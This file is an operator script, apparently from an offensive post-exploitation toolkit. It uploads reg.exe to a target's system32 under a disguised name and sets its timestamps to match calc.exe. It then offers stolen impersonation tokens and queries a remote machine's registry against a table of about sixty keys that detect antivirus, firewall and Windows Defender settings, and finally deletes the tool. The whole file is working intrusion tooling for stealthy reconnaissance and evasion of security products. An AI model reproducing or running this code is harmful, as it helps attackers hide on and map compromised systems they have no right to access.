#------------------------------------------------------------------------------- # File: r_reg.eps # Description: Uploads the reg.exe tool to the targets system32 directory. # 27 August 2008 Created.... # #------------------------------------------------------------------------------- string $ScriptsDir = GetEnv("SCRIPTSDIR"); string $sSysPath = GetEnv("SYSPATH"); string $remoteToolName = GetEnv("remoteToolName"); if ($remoteToolName == "") { $remoteToolName="$sSysPath\\cmdl16.exe"; } string $viable; string $values; string $psp; string $reg; string $os; string $osreg; $psp[0] = "Symantec - Norton Anti-Virus [7.5]"; $psp[1] = "Symantec - Norton Anti-Virus [2003 - 2008]"; $psp[2] = "Symantec - Endpoint Protection"; $psp[3] = "Symantec - Sygate Personal Firewall [5.6]"; $psp[4] = "McAfee - VirusScan [7.0 - 8.0]"; $psp[5] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSROOT"; $psp[6] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSROOT"; $psp[7] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSTEM32"; $psp[8] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSTEM32"; $psp[9] = "McAfee - VirusScan [8.5]"; $psp[10] = "McAfee - VirusScan [8.5]-> Access Protection Rules"; $psp[11] = "Kaspersky Lab - Anti-Virus [6]"; $psp[12] = "Kaspersky Lab - Anti-Virus [6]-> Enviroment"; $psp[13] = "Kaspersky Lab - Anti-Virus [6]-> Registry Guard"; $psp[14] = "Kaspersky Lab - Anti-Virus [6]-> Dangerous Behavior"; $psp[15] = "Kaspersky Lab - Anti-Virus [6]-> Process Injection"; $psp[16] = "Kaspersky Lab - Anti-Virus [6]-> Process Hiding"; $psp[17] = "Kaspersky Lab - Anti-Virus [6]-> Behavior Blocking"; $psp[18] = "Kaspersky Lab - Anti-Virus [7 , 2009]"; $psp[19] = "Kaspersky Lab - Anti-Virus [7]-> Enviroment"; $psp[20] = "Kaspersky Lab - Anti-Virus [7]-> Registry Guard"; $psp[21] = "Kaspersky Lab - Anti-Virus [7]-> Dangerous Behavior"; $psp[22] = "Kaspersky Lab - Anti-Virus [7]-> Process Injection"; $psp[23] = "Kaspersky Lab - Anti-Virus [7]-> Process Hiding"; $psp[24] = "Kaspersky Lab - Anti-Virus [7]-> Behavior Blocking"; $psp[25] = "8Signs - 8Signs Firewall"; $psp[26] = "Ahn - Ahn Lab"; $psp[27] = "ALWIL Software - AVAST! [4.x]"; $psp[28] = "AVG - Anti-Virus,Anti-Spyware[7.5]"; $psp[29] = "AVIRA - AntiVir [Classic,Premium,Workstation,Security Suite]"; $psp[30] = "BitDefender - Total Security [2008]"; $psp[31] = "BlackIce - Firewall"; $psp[32] = "Checkpoint - Zone Alarm [Anti-Virus,Firewall,Security Suite 7]"; $psp[33] = "Comodo - Firwall Pro [3.0]"; $psp[34] = "Computer Associates - eTrust Security"; $psp[35] = "Computer Associates - eTrust Internet Security Suite"; $psp[36] = "Computer Associates - eTrust Anti-Virus [8.4]"; $psp[37] = "Computer Associates - eTrust Anti-Spyware [9.1]"; $psp[38] = "Computer Assoicates - eTrust Anti-Spam [5.1]"; $psp[39] = "Computer Assoicates - eTrust Firewall"; $psp[40] = "Computer Assoicates - Jinchen Kill"; $psp[41] = "DrWeb - Anti-Virus, Enterpise Edition"; $psp[42] = "ESET - Anti-Virus, Smart Security Suite [3.0]"; $psp[43] = "KingSoft - Internet Security [2008]"; $psp[44] = "KingSoft - Internet Security [2008]-> Firewall Level Lan"; $psp[45] = "KingSoft - Internet Security [2008]-> Firewall Level Wide"; $psp[46] = "KingSoft - Internet Security [2008]-> Anti-Virus Settings"; $psp[47] = "Microsoft - Antispyware"; $psp[48] = "Microsoft - Windows Defender"; $psp[49] = "Microsoft - Windows Defender-> Threat Severity"; $psp[50] = "Microsoft - Windows Defender-> Real-Time Protection"; $psp[51] = "Microsoft - Windows Defender-> Disable Key"; $psp[52] = "Panda Software - Anti Virus [Titanium, Platinium]"; $psp[53] = "Panda Software - Anti Virus [Lite]-> Product"; $psp[54] = "Panda Software - Anti Virus [Lite]-> Version"; $psp[55] = "Panda Software - Administrator [3]"; $psp[56] = "Rising - AntiVirus [2007,2008]-> Name"; $psp[57] = "Rising - AntiVirus [2007,2008]-> Version"; $psp[58] = "SiliVaccine - AntiVirus [2005]"; $psp[59] = "ThreatFire - Firewall"; $psp[60] = "Trend Micro - Internet Security [2007]"; $psp[61] = "Trend Micro - OfficeScan [7.3, 8.0]"; $reg[0] = "HKLM\\Software\\Symantec\\Symantec Antivirus\\Install"; $reg[1] = "HKLM\\Software\\Symantec\\Norton Antivirus\\version"; $reg[2] = "HKLM\\software\\symantec\\symantec endpoint protection"; $reg[3] = "HKLM\\software\\Sygate Technologies, Inc.\\Sygate Personal Firewall\\version"; $reg[4] = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator\\Application Plugins"; $reg[5] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_27"; $reg[6] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_28"; $reg[7] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_29"; $reg[8] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_30"; $reg[9] = "HKLM\\Software\\McAfee\\ePolicy Orchestrator\\Application Plugins"; $reg[10] = "HKLM\\software\\McAfee\\VSCore\\On Access Scanner\\BehaviourBlocking\\AccessProtectionUserRules"; $reg[11] = "HKLM\\Software\\KasperskyLab\\AVP6"; $reg[12] = "HKLM\\Software\\KasperskyLab\\AVP6\\environment"; $reg[13] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled"; $reg[14] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000"; $reg[15] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002"; $reg[16] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003"; $reg[17] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\enabled"; $reg[18] = "HKLM\\software\\kasperskylab\\protected"; $reg[19] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\environment"; $reg[20] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled"; $reg[21] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000"; $reg[22] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002"; $reg[23] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003"; $reg[24] = "HKLM\\software\\kasperskylab\\protectedb\\AVP7\\profiles\\behavior_blocking\\enabled"; $reg[25] = "HKLM\\software\\8signs\\8signs Firewall"; $reg[26] = "HKLM\\software\\ahnlab"; $reg[27] = "HKLM\\software\\ALWIL Software\\AVAST"; $reg[28] = "HKLM\\software\\Grisoft"; $reg[29] = "HKLM\\software\\Avira"; $reg[30] = "HKLM\\software\\BitDefender"; $reg[31] = "HKLM\\software\\Network Ice\\BlackIce"; $reg[32] = "HKLM\\software\\zone labs\\zone alarm\\CurrentVersion"; $reg[33] = "HKLM\\software\\comodogroup\\cdi\\1\\product version"; $reg[34] = "HKLM\\software\\computerassociates\\eTrust Suite Personal"; $reg[35] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\Suite\\version"; $reg[36] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AV\\version"; $reg[37] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\PP\\version"; $reg[38] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AS\\version"; $reg[39] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\pfw\\version"; $reg[40] = "HKLM\\software\\computerassoicates\\eTrustITM\\CurrentVersion\\Version"; $reg[41] = "HKLM\\software\\Doctor Web, Ltd"; $reg[42] = "HKLM\\software\\eset\\eset security\\currentversion\\info"; $reg[43] = "HKLM\\Software\\Kingsoft\\antispy\\installpath"; $reg[44] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Lan"; $reg[45] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Wide"; $reg[46] = "HKLM\\Software\\Kingsoft\\antivirus\\KWatchSVC"; $reg[47] = "HKLM\\Software\\GIANTCompany\\AntiSpyware"; $reg[48] = "HKLM\\Software\\Microsoft\\Windows Defender"; $reg[49] = "HKLM\\Software\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction"; $reg[50] = "HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection"; $reg[51] = "HKLM\\Software\\Microsoft\\Windows Defender\\DisableAntiSpyware"; $reg[52] = "HKLM\\Software\\panda software\\pavshld\\products"; $reg[53] = "HKLM\\Software\\panda software\\panda antivirus lite\\product"; $reg[54] = "HKLM\\Software\\panda software\\panda antivirus lite\\version"; $reg[55] = "HKLM\\Software\\panda software"; $reg[56] = "HKLM\\Software\\rising\\rav\\name"; $reg[57] = "HKLM\\Software\\rising\\rav\\version"; $reg[58] = "HKLM\\Software\\STS Tech-Service\\SVaccine"; $reg[59] = "HKLM\\Software\\PCTools\\ThreatFire"; $reg[60] = "HKLM\\Software\\TrendMicro\\PC-cillin"; $reg[61] = "HKLM\\Software\\TrendMicro\\PC-cillinNTCorp\\CurrentVersion\\Misc.\\ProgramVer"; $os[0] = "Microsoft Windows XP - Professional Service Pack 3"; $osreg[0] = "HKLM\\software\\microsoft\\updates\\windows xp\\sp3"; string $split = SplitPath("$remoteToolName"); @echo on; ifnot (prompt "Do you want to upload the tool as \"$remoteToolName\" ?") { $remoteToolName=GetInput("What do you want to upload the tool as?"); } ifnot (`put $ScriptsDir\\..\\..\\Tools\\REG.exe -name $remoteToolName`) { echo "File already exists?"; return false; } `matchtimes $sSysPath\\calc.exe $remoteToolName`; string $remotemachine = GetInput("Enter Remote Machine [ or netbios_name]"); ifnot(getViableTokens($viable, $values)) { echo ""; echo "---------------------------------"; echo "| Couldn't get Exisiting Tokens |"; echo "---------------------------------"; } echo ""; echo ""; echo ""; int $idx = 0; int $j = 0; echo "($j). QUIT"; while($idx < sizeof($viable)) { $j++; echo "($j). Use Token $viable[$idx] ($values[$idx])"; $idx++; } $j++; echo "($j). Enter own user"; $j++; echo "($j). Already authenicated (WORKGROUP ZB)"; int $choice = GetInput("Enter the desired option"); int $j1 = $j; $j1--; string $user; if($choice == 0){ if (prompt `del $split[1] -path "$split[0]"`){ sleep(300); `dir $split[1] -path "$split[0]"`; } return true; }else if($choice == $j) { $user = ""; }else if($choice == $j1){ $user = GetInput("Enter User/Token name"); }else{ $choice--; $user = $viable[$choice]; } while(prompt "Query target for Registry Key? [DO NOT QUIT, NO WILL STOP SCRIPT EXECUTE CLEANUP]") { int $i = 0; int $ind = 0; echo "($i). Quit"; while($ind < sizeof($psp)) { $i++; echo "($i). PSP: $psp[$ind]"; $ind++; } $ind = 0; while($ind < sizeof($os)) { $i++; echo "($i). OS: $os[$ind]"; $ind++; } $i++; echo "($i). Enter custom query"; int $regchoice = GetInput("Enter the desired query"); string $key; if($regchoice == 0){ if (prompt `del $split[1] -path "$split[0]"`){ sleep(300); `dir $split[1] -path "$split[0]"`; } return true; } else if($regchoice == $i) { $key = GetInput("Enter Reg Key [Ex: HKLM\\Software\\PSP Key]"); } else{ $regchoice--; if($regchoice < sizeof($psp)) { $key = $reg[$regchoice]; }else{ int $idx1 = 0; while($idx1 < sizeof($psp)){ $regchoice--; $idx1++; } $key = $osreg[$regchoice]; } } if($user == ""){ prompt `run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`; }else{ prompt `user=$user run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`; } } if (prompt `del $split[1] -path "$split[0]"`){ sleep(300); `dir $split[1] -path "$split[0]"`; } return true; sub getViableTokens(REF string $token, REF string $value) { @record on; `lpgetenv`; @record off; string $envOption = GetCmdData("option"); string $envValue = GetCmdData("value"); ifnot(defined($envOption)) { echo "Unable to list tokens"; return false; } string $viableTokens; int $j = 0; int $k = 0; while($j < sizeof($envOption)) { string $temp = split("_USER_", $envOption[$j]); if(sizeof($temp) == 2) { if(strlen($temp[0]) == 0) { $token[$k] = $temp[1]; $value[$k] = $envValue[$j]; $k++; } } $j++; } return true; } #